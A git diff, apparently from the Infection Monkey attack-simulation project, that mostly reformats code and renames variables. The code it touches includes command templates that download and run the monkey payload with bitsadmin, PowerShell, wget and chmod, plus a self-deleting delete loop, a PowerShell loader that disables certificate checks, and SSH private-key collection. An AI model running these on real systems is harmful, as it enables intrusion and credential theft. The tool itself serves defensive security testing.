a/monkey/infection_monkey/model/__init__.py b/monkey/infection_monkey/model/__init__.py index 3e333a26d..254bce966 100644 --- a/monkey/infection_monkey/model/__init__.py +++ b/monkey/infection_monkey/model/__init__.py @@ -11,11 +11,14 @@ MONKEY_CMDLINE_LINUX = './%%(monkey_filename)s %s' % (MONKEY_ARG, ) GENERAL_CMDLINE_LINUX = '(cd %(monkey_directory)s && %(monkey_commandline)s)' DROPPER_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, ) MONKEY_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, ) -MONKEY_CMDLINE_HTTP = 'cmd.exe /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd /c %%(monkey_path)s %s"' % (MONKEY_ARG, ) -DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(file_path)s exit)) > NUL 2>&1' +MONKEY_CMDLINE_HTTP = 'cmd.exe /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd ' \ + '/c %%(monkey_path)s %s"' % (MONKEY_ARG, ) +DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(' \ + 'file_path)s exit)) > NUL 2>&1 ' # Commands used for downloading monkeys -POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(monkey_path)s\' -UseBasicParsing\"" +POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(" \ + "monkey_path)s\' -UseBasicParsing\" " WGET_HTTP_UPLOAD = "wget -O %(monkey_path)s %(http_path)s" BITSADMIN_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s' CHMOD_MONKEY = "chmod +x %(monkey_path)s" diff --git a/monkey/infection_monkey/monkeyfs.py b/monkey/infection_monkey/monkeyfs.py index c5ddef1aa..b65443c76 100644 --- a/monkey/infection_monkey/monkeyfs.py +++ b/monkey/infection_monkey/monkeyfs.py @@ -34,7 +34,6 @@ class VirtualFile(BytesIO): return path in VirtualFile._vfs - def getsize(path): if path.startswith(MONKEYFS_PREFIX): return VirtualFile.getsize(path) diff --git a/monkey/infection_monkey/network/firewall.py b/monkey/infection_monkey/network/firewall.py index 16af673b1..06d98dcbd 100644 --- a/monkey/infection_monkey/network/firewall.py +++ b/monkey/infection_monkey/network/firewall.py @@ -8,6 +8,7 @@ def _run_netsh_cmd(command, args): if value])), stdout=subprocess.PIPE) return cmd.stdout.read().strip().lower().endswith('ok.') + class FirewallApp(object): def is_enabled(self, **kwargs): return False @@ -83,9 +84,9 @@ class WinAdvFirewall(FirewallApp): for rule in list(self._rules.values()): if rule.get('program') == sys.executable and \ - 'in' == rule.get('dir') and \ - 'allow' == rule.get('action') and \ - 4 == len(list(rule.keys())): + 'in' == rule.get('dir') and \ + 'allow' == rule.get('action') and \ + 4 == len(list(rule.keys())): return True return False diff --git a/monkey/infection_monkey/network/httpfinger.py b/monkey/infection_monkey/network/httpfinger.py index 30292d99f..935d397d9 100644 --- a/monkey/infection_monkey/network/httpfinger.py +++ b/monkey/infection_monkey/network/httpfinger.py @@ -39,7 +39,7 @@ class HTTPFinger(HostFinger): ssl = True if 'https://' in url else False self.init_service(host.services, ('tcp-' + port[1]), port[0]) host.services['tcp-' + port[1]]['name'] = 'http' - host.services['tcp-' + port[1]]['data'] = (server,ssl) + host.services['tcp-' + port[1]]['data'] = (server, ssl) LOG.info("Port %d is open on host %s " % (port[0], host)) break # https will be the same on the same port except Timeout: diff --git a/monkey/infection_monkey/network/ping_scanner.py b/monkey/infection_monkey/network/ping_scanner.py index bf215168e..b76db8ad3 100644 --- a/monkey/infection_monkey/network/ping_scanner.py +++ b/monkey/infection_monkey/network/ping_scanner.py @@ -20,7 +20,6 @@ LOG = logging.getLogger(__name__) class PingScanner(HostScanner, HostFinger): - _SCANNED_SERVICE = '' def __init__(self): @@ -49,14 +48,12 @@ class PingScanner(HostScanner, HostFinger): if not "win32" == sys.platform: timeout /= 1000 - sub_proc = subprocess.Popen(["ping", - PING_COUNT_FLAG, - "1", - PING_TIMEOUT_FLAG, - str(timeout), host.ip_addr], - stdout=subprocess.PIPE, - stderr=subprocess.PIPE, - text=True) + sub_proc = subprocess.Popen( + ["ping", PING_COUNT_FLAG, "1", PING_TIMEOUT_FLAG, str(timeout), host.ip_addr], + stdout=subprocess.PIPE, + stderr=subprocess.PIPE, + text=True + ) output = " ".join(sub_proc.communicate()) regex_result = self._ttl_regex.search(output) diff --git a/monkey/infection_monkey/network/smbfinger.py b/monkey/infection_monkey/network/smbfinger.py index 8a267e9d1..7224e032c 100644 --- a/monkey/infection_monkey/network/smbfinger.py +++ b/monkey/infection_monkey/network/smbfinger.py @@ -30,7 +30,7 @@ class Packet: return b"".join(content_list) -##### SMB Packets ##### +# SMB Packets class SMBHeader(Packet): fields = odict([ ("proto", b"\xff\x53\x4d\x42"), @@ -92,7 +92,13 @@ class SMBSessionFingerData(Packet): ("capabilities", b"\xd4\x00\x00\xa0"), ("bcc1", ""), ("Data", - b"\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"), + b"\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02" + b"\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00" + b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f" + b"\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63" + b"\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00" + b"\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35" + b"\x00\x2e\x00\x31\x00\x00\x00\x00\x00"), ]) diff --git a/monkey/infection_monkey/network/tcp_scanner.py b/monkey/infection_monkey/network/tcp_scanner.py index 2ea88842f..fa2d812ae 100644 --- a/monkey/infection_monkey/network/tcp_scanner.py +++ b/monkey/infection_monkey/network/tcp_scanner.py @@ -25,7 +25,8 @@ class TcpScanner(HostScanner, HostFinger): Scans a target host to see if it's alive using the tcp_target_ports specified in the configuration. :param host: VictimHost structure :param only_one_port: Currently unused. - :return: T/F if there is at least one open port. In addition, the host object is updated to mark those services as alive. + :return: T/F if there is at least one open port. + In addition, the host object is updated to mark those services as alive. """ # maybe hide under really bad detection systems diff --git a/monkey/infection_monkey/system_info/SSH_info_collector.py b/monkey/infection_monkey/system_info/SSH_info_collector.py index 60c509fc6..31afdb8ed 100644 --- a/monkey/infection_monkey/system_info/SSH_info_collector.py +++ b/monkey/infection_monkey/system_info/SSH_info_collector.py @@ -63,7 +63,7 @@ class SSHCollector(object): LOG.info("Found public key in %s" % public) try: with open(public) as f: - info['public_key'] = f.read() + info['public_key'] = f.read() # By default private key has the same name as public, only without .pub private = os.path.splitext(public)[0] if os.path.exists(private): diff --git a/monkey/infection_monkey/transport/base.py b/monkey/infection_monkey/transport/base.py index e6a5bc366..a02d86708 100644 --- a/monkey/infection_monkey/transport/base.py +++ b/monkey/infection_monkey/transport/base.py @@ -27,4 +27,4 @@ def update_last_serve_time(): def get_last_serve_time(): global g_last_served - return g_last_served \ No newline at end of file + return g_last_served diff --git a/monkey/monkey_island/cc/models/test_monkey.py b/monkey/monkey_island/cc/models/test_monkey.py index 472c5770b..a7f6f90da 100644 --- a/monkey/monkey_island/cc/models/test_monkey.py +++ b/monkey/monkey_island/cc/models/test_monkey.py @@ -84,7 +84,7 @@ class TestMonkey(IslandTestCase): self.clean_monkey_db() linux_monkey = Monkey(guid=str(uuid.uuid4()), - description="Linux shay-Virtual-Machine 4.15.0-50-generic #54-Ubuntu SMP Mon May 6 18:46:08 UTC 2019 x86_64 x86_64") + description="Linux shay-Virtual-Machine 4.15.0-50-generic #54-Ubuntu") windows_monkey = Monkey(guid=str(uuid.uuid4()), description="Windows bla bla bla") unknown_monkey = Monkey(guid=str(uuid.uuid4()), diff --git a/monkey/monkey_island/cc/resources/root.py b/monkey/monkey_island/cc/resources/root.py index d7cae8bd7..59a8fbe7c 100644 --- a/monkey/monkey_island/cc/resources/root.py +++ b/monkey/monkey_island/cc/resources/root.py @@ -1,18 +1,18 @@ -from datetime import datetime import logging import threading +from datetime import datetime import flask_restful from flask import request, make_response, jsonify from monkey_island.cc.auth import jwt_required from monkey_island.cc.database import mongo +from monkey_island.cc.services.database import Database from monkey_island.cc.services.node import NodeService from monkey_island.cc.services.reporting.report import ReportService -from monkey_island.cc.services.attack.attack_report import AttackReportService -from monkey_island.cc.services.reporting.report_generation_synchronisation import is_report_being_generated, safe_generate_reports +from monkey_island.cc.services.reporting.report_generation_synchronisation import is_report_being_generated, \ + safe_generate_reports from monkey_island.cc.utils import local_ip_addresses -from monkey_island.cc.services.database import Database __author__ = 'Barak' diff --git a/monkey/monkey_island/cc/services/attack/attack_report.py b/monkey/monkey_island/cc/services/attack/attack_report.py index f88b7e8b9..1c18f7654 100644 --- a/monkey/monkey_island/cc/services/attack/attack_report.py +++ b/monkey/monkey_island/cc/services/attack/attack_report.py @@ -75,7 +75,10 @@ class AttackReportService: Gets timestamp of latest attack telem :return: timestamp of latest attack telem """ - return [x['timestamp'] for x in mongo.db.telemetry.find({'telem_category': 'attack'}).sort('timestamp', -1).limit(1)][0] + return [ + x['timestamp'] for x in + mongo.db.telemetry.find({'telem_category': 'attack'}).sort('timestamp', -1).limit(1) + ][0] @staticmethod def get_latest_report(): diff --git a/monkey/monkey_island/cc/services/config.py b/monkey/monkey_island/cc/services/config.py index 2d38b6498..09771302d 100644 --- a/monkey/monkey_island/cc/services/config.py +++ b/monkey/monkey_island/cc/services/config.py @@ -122,11 +122,16 @@ class ConfigService: @staticmethod def ssh_add_keys(public_key, private_key, user, ip): - if not ConfigService.ssh_key_exists(ConfigService.get_config_value(['internal', 'exploits', 'exploit_ssh_keys'], - False, False), user, ip): - ConfigService.add_item_to_config_set('internal.exploits.exploit_ssh_keys', - {"public_key": public_key, "private_key": private_key, - "user": user, "ip": ip}) + if not ConfigService.ssh_key_exists( + ConfigService.get_config_value(['internal', 'exploits', 'exploit_ssh_keys'], False, False), user, ip): + ConfigService.add_item_to_config_set( + 'internal.exploits.exploit_ssh_keys', + { + "public_key": public_key, + "private_key": private_key, + "user": user, "ip": ip + } + ) @staticmethod def ssh_key_exists(keys, user, ip): diff --git a/monkey/monkey_island/cc/services/remote_run_aws.py b/monkey/monkey_island/cc/services/remote_run_aws.py index 77b6d95ea..4ec1fd427 100644 --- a/monkey/monkey_island/cc/services/remote_run_aws.py +++ b/monkey/monkey_island/cc/services/remote_run_aws.py @@ -131,7 +131,7 @@ class RemoteRunAwsService: return r"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {" \ r"$true}; (New-Object System.Net.WebClient).DownloadFile('https://" + island_ip + \ r":5000/api/monkey/download/monkey-windows-" + bit_text + r".exe','.\\monkey.exe'); " \ - r";Start-Process -FilePath '.\\monkey.exe' -ArgumentList 'm0nk3y -s " + island_ip + r":5000'; " + r";Start-Process -FilePath '.\\monkey.exe' -ArgumentList 'm0nk3y -s " + island_ip + r":5000'; " @staticmethod def _get_run_monkey_cmd_line(is_linux, is_64bit, island_ip): diff --git a/monkey/monkey_island/cc/services/reporting/aws_exporter.py b/monkey/monkey_island/cc/services/reporting/aws_exporter.py index 8690f6ee1..f0b6bdb6a 100644 --- a/monkey/monkey_island/cc/services/reporting/aws_exporter.py +++ b/monkey/monkey_island/cc/services/reporting/aws_exporter.py @@ -148,8 +148,8 @@ class AWSExporter(Exporter): severity=5, title="Weak segmentation - Machines were able to communicate over unused ports.", description="Use micro-segmentation policies to disable communication other than the required.", - recommendation="Machines are not locked down at port level. Network tunnel was set up from {0} to {1}" - .format(issue['machine'], issue['dest']), + recommendation="Machines are not locked down at port level. " + "Network tunnel was set up from {0} to {1}".format(issue['machine'], issue['dest']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -160,10 +160,12 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=10, title="Samba servers are vulnerable to 'SambaCry'", - description="Change {0} password to a complex one-use password that is not shared with other computers on the network. Update your Samba server to 4.4.14 and up, 4.5.10 and up, or 4.6.4 and up." \ - .format(issue['username']), - recommendation="The machine {0} ({1}) is vulnerable to a SambaCry attack. The Monkey authenticated over the SMB protocol with user {2} and its password, and used the SambaCry vulnerability.".format( - issue['machine'], issue['ip_address'], issue['username']), + description="Change {0} password to a complex one-use password that is not shared with other computers on the " + "network. Update your Samba server to 4.4.14 and up, " + "4.5.10 and up, or 4.6.4 and up.".format(issue['username']), + recommendation="The machine {0} ({1}) is vulnerable to a SambaCry attack. The Monkey authenticated over the SMB " + "protocol with user {2} and its password, and used the SambaCry " + "vulnerability.".format(issue['machine'], issue['ip_address'], issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -174,10 +176,10 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=5, title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.", - description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format( - issue['username']), - recommendation="The machine {0}({1}) is vulnerable to a SMB attack. The Monkey used a pass-the-hash attack over SMB protocol with user {2}.".format( - issue['machine'], issue['ip_address'], issue['username']), + description="Change {0}'s password to a complex one-use password that is not shared with other computers on the " + "network.".format(issue['username']), + recommendation="The machine {0}({1}) is vulnerable to a SMB attack. The Monkey used a pass-the-hash attack over " + "SMB protocol with user {2}.".format(issue['machine'], issue['ip_address'], issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -188,10 +190,11 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=1, title="Machines are accessible using SSH passwords supplied by the user during the Monkey's configuration.", - description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format( - issue['username']), - recommendation="The machine {0} ({1}) is vulnerable to a SSH attack. The Monkey authenticated over the SSH protocol with user {2} and its password.".format( - issue['machine'], issue['ip_address'], issue['username']), + description="Change {0}'s password to a complex one-use password that is not shared with other computers on the " + "network.".format(issue['username']), + recommendation="The machine {0} ({1}) is vulnerable to a SSH attack. The Monkey authenticated over the SSH" + " protocol with user {2} and its " + "password.".format(issue['machine'], issue['ip_address'], issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -203,8 +206,11 @@ class AWSExporter(Exporter): severity=1, title="Machines are accessible using SSH passwords supplied by the user during the Monkey's configuration.", description="Protect {ssh_key} private key with a pass phrase.".format(ssh_key=issue['ssh_key']), - recommendation="The machine {machine} ({ip_address}) is vulnerable to a SSH attack. The Monkey authenticated over the SSH protocol with private key {ssh_key}.".format( - machine=issue['machine'], ip_address=issue['ip_address'], ssh_key=issue['ssh_key']), + recommendation="The machine {machine} ({ip_address}) is vulnerable to a SSH attack. The Monkey authenticated " + "over the SSH protocol with private key {ssh_key}.".format( + machine=issue['machine'], + ip_address=issue['ip_address'], + ssh_key=issue['ssh_key']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -216,8 +222,10 @@ class AWSExporter(Exporter): severity=10, title="Elastic Search servers are vulnerable to CVE-2015-1427", description="Update your Elastic Search server to version 1.4.3 and up.", - recommendation="The machine {0}({1}) is vulnerable to an Elastic Groovy attack. The attack was made possible because the Elastic Search server was not patched against CVE-2015-1427.".format( - issue['machine'], issue['ip_address']), + recommendation="The machine {0}({1}) is vulnerable to an Elastic Groovy attack. The attack was made " + "possible because the Elastic Search server was not patched against CVE-2015-1427.".format( + issue['machine'], + issue['ip_address']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -228,13 +236,13 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=1, title="Weak segmentation - Machines from different segments are able to communicate.", - description="Segment your network and make sure there is no communication between machines from different segments.", + description="Segment your network and make sure there is no communication between machines from different " + "segments.", recommendation="The network can probably be segmented. A monkey instance on \ {0} in the networks {1} \ could directly access the Monkey Island server in the networks {2}.".format(issue['machine'], issue['networks'], - issue[ - 'server_networks']), + issue['server_networks']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -259,8 +267,9 @@ class AWSExporter(Exporter): title="Machines are vulnerable to 'Shellshock'", description="Update your Bash to a ShellShock-patched version.", recommendation="The machine {0} ({1}) is vulnerable to a ShellShock attack. " - "The attack was made possible because the HTTP server running on TCP port {2} was vulnerable to a shell injection attack on the paths: {3}.".format( - issue['machine'], issue['ip_address'], issue['port'], issue['paths']), + "The attack was made possible because the HTTP server running on TCP port {2} was vulnerable to a " + "shell injection attack on the paths: {3}.".format( + issue['machine'], issue['ip_address'], issue['port'], issue['paths']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -271,10 +280,13 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=1, title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.", - description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format( - issue['username']), - recommendation="The machine {0} ({1}) is vulnerable to a SMB attack. The Monkey authenticated over the SMB protocol with user {2} and its password.".format( - issue['machine'], issue['ip_address'], issue['username']), + description="Change {0}'s password to a complex one-use password that is not shared with other computers on the " + "network.".format(issue['username']), + recommendation="The machine {0} ({1}) is vulnerable to a SMB attack. The Monkey authenticated over the SMB " + "protocol with user {2} and its password.".format( + issue['machine'], + issue['ip_address'], + issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -285,9 +297,13 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=1, title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.", - description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.", - recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey authenticated over the WMI protocol with user {username} and its password.".format( - machine=issue['machine'], ip_address=issue['ip_address'], username=issue['username']), + description="Change {0}'s password to a complex one-use password that is not shared with other computers on the " + "network.", + recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey authenticated over " + "the WMI protocol with user {username} and its password.".format( + machine=issue['machine'], + ip_address=issue['ip_address'], + username=issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -298,10 +314,13 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=1, title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.", - description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format( - issue['username']), - recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey used a pass-the-hash attack over WMI protocol with user {username}".format( - machine=issue['machine'], ip_address=issue['ip_address'], username=issue['username']), + description="Change {0}'s password to a complex one-use password that is not shared with other computers on the " + "network.".format(issue['username']), + recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey used a " + "pass-the-hash attack over WMI protocol with user {username}".format( + machine=issue['machine'], + ip_address=issue['ip_address'], + username=issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -325,9 +344,10 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=1, title="Shared local administrator account - Different machines have the same account as a local administrator.", - description="Make sure the right administrator accounts are managing the right machines, and that there isn\'t an unintentional local admin sharing.", - recommendation="Here is a list of machines which the account {username} is defined as an administrator: {shared_machines}".format( - username=issue['username'], shared_machines=issue['shared_machines']), + description="Make sure the right administrator accounts are managing the right machines, and that there isn\'t " + "an unintentional local admin sharing.", + recommendation="Here is a list of machines which the account {username} is defined as an administrator: " + "{shared_machines}".format(username=issue['username'], shared_machines=issue['shared_machines']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -339,8 +359,9 @@ class AWSExporter(Exporter): severity=1, title="Mimikatz found login credentials of a user who has admin access to a server defined as critical.", description="This critical machine is open to attacks via strong users with access to it.", - recommendation="The services: {services} have been found on the machine thus classifying it as a critical machine. These users has access to it:{threatening_users}.".format( - services=issue['services'], threatening_users=issue['threatening_users']), + recommendation="The services: {services} have been found on the machine thus classifying it as a critical " + "machine. These users has access to it:{threatening_users}.".format( + services=issue['services'], threatening_users=issue['threatening_users']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -353,8 +374,8 @@ class AWSExporter(Exporter): title="Struts2 servers are vulnerable to remote code execution.", description="Upgrade Struts2 to version 2.3.32 or 2.5.10.1 or any later versions.", recommendation="Struts2 server at {machine} ({ip_address}) is vulnerable to remote code execution attack." - " The attack was made possible because the server is using an old version of Jakarta based file upload Multipart parser.".format( - machine=issue['machine'], ip_address=issue['ip_address']), + "The attack was made possible because the server is using an old version of Jakarta based file " + "upload Multipart parser.".format(machine=issue['machine'], ip_address=issue['ip_address']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -368,8 +389,8 @@ class AWSExporter(Exporter): description="Install Oracle critical patch updates. Or update to the latest version. " \ "Vulnerable versions are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.", recommendation="Oracle WebLogic server at {machine} ({ip_address}) is vulnerable to remote code execution attack." - " The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware (subcomponent: WLS Security).".format( - machine=issue['machine'], ip_address=issue['ip_address']), + "The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware " + "(subcomponent: WLS Security).".format(machine=issue['machine'], ip_address=issue['ip_address']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) diff --git a/monkey/monkey_island/cc/services/reporting/pth_report.py b/monkey/monkey_island/cc/services/reporting/pth_report.py index 5e77b6395..ecb209c69 100644 --- a/monkey/monkey_island/cc/services/reporting/pth_report.py +++ b/monkey/monkey_island/cc/services/reporting/pth_report.py @@ -30,7 +30,6 @@ class PTHReportService(object): } """ - pipeline = [ {"$match": { 'NTLM_secret': { @@ -55,7 +54,7 @@ class PTHReportService(object): :param admin_on_machines: A list of "monkey" documents "_id"s :param domain_name: The admins' domain name :return: - A list of formatted machines names *domain*\*hostname*, to use in shared admins issues. + A list of formatted machines names *domain*/*hostname*, to use in shared admins issues. """ machines = mongo.db.monkey.find({'_id': {'$in': admin_on_machines}}, {'hostname': 1}) return [domain_name + '\\' + i['hostname'] for i in list(machines)] @@ -108,7 +107,7 @@ class PTHReportService(object): 'username': user['name'], 'domain_name': user['domain_name'], 'hostname': NodeService.get_hostname_by_id(ObjectId(user['machine_id'])) if user['machine_id'] else None - } for user in doc['Docs'] + } for user in doc['Docs'] ] users_cred_groups.append({'cred_groups': users_list}) @@ -144,7 +143,8 @@ class PTHReportService(object): { 'name': admin['name'], 'domain_name': admin['domain_name'], - 'admin_on_machines': PTHReportService.__get_admin_on_machines_format(admin['admin_on_machines'], admin['domain_name']) + 'admin_on_machines': PTHReportService.__get_admin_on_machines_format(admin['admin_on_machines'], + admin['domain_name']) } for admin in admins ] @@ -153,11 +153,11 @@ class PTHReportService(object): admins_info = PTHReportService.get_shared_admins_nodes() return [ { - 'is_local': False, - 'type': 'shared_admins_domain', - 'machine': admin['domain_name'], - 'username': admin['domain_name'] + '\\' + admin['name'], - 'shared_machines': admin['admin_on_machines'], + 'is_local': False, + 'type': 'shared_admins_domain', + 'machine': admin['domain_name'], + 'username': admin['domain_name'] + '\\' + admin['name'], + 'shared_machines': admin['admin_on_machines'], } for admin in admins_info] @@ -262,7 +262,7 @@ class PTHReportService(object): return { 'nodes': PTHReportService.generate_map_nodes(), 'edges': PTHReportService.generate_edges() - } + } @staticmethod def get_report(): @@ -283,4 +283,3 @@ class PTHReportService(object): } return report - diff --git a/monkey/monkey_island/cc/utils.py b/monkey/monkey_island/cc/utils.py index cf59ae7df..58dff1f5a 100644 --- a/monkey/monkey_island/cc/utils.py +++ b/monkey/monkey_island/cc/utils.py @@ -65,11 +65,18 @@ def local_ip_addresses(): # The subnets list should not change often. Therefore, we can cache the result and never call this function # more than once. This stopgap measure is here since this function is called a lot of times during the report # generation. -# This means that if the interfaces or subnets of the Island machine change, the Island process needs to be restarted. +# This means that if the interfaces or subnets of the Island machine change, the Island process needs to be restarted. @lru(maxsize=1) def get_subnets(): subnets = [] for interface in interfaces(): addresses = ifaddresses(interface).get(AF_INET, []) - subnets.extend([ipaddress.ip_interface(link['addr'] + '/' + link['netmask']).network for link in addresses if link['addr'] != '127.0.0.1']) + subnets.extend( + [ + ipaddress.ip_interface(link['addr'] + '/' + link['netmask']).network + for link + in addresses + if link['addr'] != '127.0.0.1' + ] + ) return subnets From 4b0ea4aed7629636158eb729cc112e56aa6cd904 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 16:15:31 +0200 Subject: [PATCH 25/53] Variable names and const location fixes --- monkey/infection_monkey/control.py | 2 +- monkey/infection_monkey/dropper.py | 5 +++-- monkey/infection_monkey/network/firewall.py | 6 +++--- monkey/infection_monkey/network/info.py | 11 +++++------ monkey/infection_monkey/transport/http.py | 10 ++++------ monkey/monkey_island/cc/environment/environment.py | 4 ++-- monkey/monkey_island/cc/models/monkey.py | 2 +- monkey/monkey_island/cc/services/config.py | 12 ++++++------ monkey/monkey_island/cc/services/edge.py | 6 +++--- monkey/monkey_island/cc/services/node.py | 6 +++--- 10 files changed, 31 insertions(+), 33 deletions(-) diff --git a/monkey/infection_monkey/control.py b/monkey/infection_monkey/control.py index 54d528976..b063744ad 100644 --- a/monkey/infection_monkey/control.py +++ b/monkey/infection_monkey/control.py @@ -304,7 +304,7 @@ class ControlClient(object): try: target_addr, target_port = my_proxy.split(':', 1) target_port = int(target_port) - except: + except ValueError: return None else: proxy_class = HTTPConnectProxy diff --git a/monkey/infection_monkey/dropper.py b/monkey/infection_monkey/dropper.py index ee1194035..0fc6dd10a 100644 --- a/monkey/infection_monkey/dropper.py +++ b/monkey/infection_monkey/dropper.py @@ -26,6 +26,7 @@ else: try: WindowsError except NameError: + # noinspection PyShadowingBuiltins WindowsError = IOError __author__ = 'itamar' @@ -103,14 +104,14 @@ class MonkeyDrops(object): dropper_date_reference_path = WormConfiguration.dropper_date_reference_path_linux try: ref_stat = os.stat(dropper_date_reference_path) - except OSError as exc: + except OSError: LOG.warning("Cannot set reference date using '%s', file not found", dropper_date_reference_path) else: try: os.utime(self._config['destination_path'], (ref_stat.st_atime, ref_stat.st_mtime)) - except: + except OSError: LOG.warning("Cannot set reference date to destination file") monkey_options =\ diff --git a/monkey/infection_monkey/network/firewall.py b/monkey/infection_monkey/network/firewall.py index 06d98dcbd..3b0161bbb 100644 --- a/monkey/infection_monkey/network/firewall.py +++ b/monkey/infection_monkey/network/firewall.py @@ -25,7 +25,7 @@ class FirewallApp(object): def __enter__(self): return self - def __exit__(self, type, value, traceback): + def __exit__(self, exc_type, value, traceback): self.close() def close(self): @@ -49,9 +49,9 @@ class WinAdvFirewall(FirewallApp): except: return None - def add_firewall_rule(self, name="Firewall", dir="in", action="allow", program=sys.executable, **kwargs): + def add_firewall_rule(self, name="Firewall", direction="in", action="allow", program=sys.executable, **kwargs): netsh_args = {'name': name, - 'dir': dir, + 'dir': direction, 'action': action, 'program': program} netsh_args.update(kwargs) diff --git a/monkey/infection_monkey/network/info.py b/monkey/infection_monkey/network/info.py index cc198312c..2d7b981f5 100644 --- a/monkey/infection_monkey/network/info.py +++ b/monkey/infection_monkey/network/info.py @@ -16,6 +16,11 @@ from infection_monkey.utils.environment 